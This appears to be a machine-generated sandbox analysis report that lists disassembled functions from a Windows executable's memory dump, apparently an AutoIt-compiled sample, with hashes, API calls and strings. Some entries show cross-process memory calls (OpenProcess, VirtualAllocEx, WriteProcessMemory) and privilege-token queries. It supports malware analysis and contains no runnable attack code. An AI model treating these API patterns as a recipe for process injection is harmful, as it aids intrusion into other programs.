Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA

Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64

Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
MessageBeep.USER32(00000000), ref: 0045C226
KillTimer.USER32(?,0000040A), ref: 0045C242
EndDialog.USER32(?,00000001), ref: 0045C25C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59

Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004013BF
StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
SelectObject.GDI32(?,00000000), ref: 004013EE
DeleteObject.GDI32 ref: 00401401
StrokePath.GDI32(?), ref: 0040141C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28

Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB

__swprintf.LIBCMT ref: 00412ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 9d263dc99e01ace67154297f196ed366977db671da04b9edd1b72bde1f802950
Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
Opcode Fuzzy Hash: 9d263dc99e01ace67154297f196ed366977db671da04b9edd1b72bde1f802950
Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A

Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE

Strings

Container, xrefs: 0045B43B
AutoIt3GUI, xrefs: 0045B436
%I, xrefs: 0045B561

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%I
API String ID: 3565006973-4251005282
Opcode ID: 859201fce2af07cea7d3cab38f5f66955440e88cc47174b58300a9c10060e76e
Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
Opcode Fuzzy Hash: 859201fce2af07cea7d3cab38f5f66955440e88cc47174b58300a9c10060e76e
Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4

Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004250AD

Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B

Strings

pow, xrefs: 00425085, 004250A2

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E

Function 00448584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044862B
_memmove.LIBCMT ref: 00448685

Strings

3cA, xrefs: 0044860C
_A, xrefs: 004486FF, 0044DFDC, 0044DFF8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID: 3cA$_A
API String ID: 4104443479-3480954128
Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55

Function 004597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F

Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1

Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9

Strings

@, xrefs: 00459911

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5

Function 004873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499

Strings

SysMonthCal32, xrefs: 0048742C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4

Function 00486CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70

Strings

Listbox, xrefs: 00486D08

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4

Function 0048770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794

Strings

msctls_trackbar32, xrefs: 00487749

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24

Function 00426B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00426B93
__calloc_crt.LIBCMT ref: 00426BAC

Strings

@BL, xrefs: 00426BC3
K, xrefs: 00426BD1

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __calloc_crt
String ID: K$@BL
API String ID: 3494438863-2209178351
Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C

Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404C1D
kernel32.dll, xrefs: 00404C0C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728

Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00404C50
kernel32.dll, xrefs: 00404C3F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728

Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07

Strings

RegDeleteKeyExW, xrefs: 00480E01
advapi32.dll, xrefs: 00480DF0

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28

Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100

Strings

GetModuleHandleExW, xrefs: 004790FA
kernel32.dll, xrefs: 004790E9
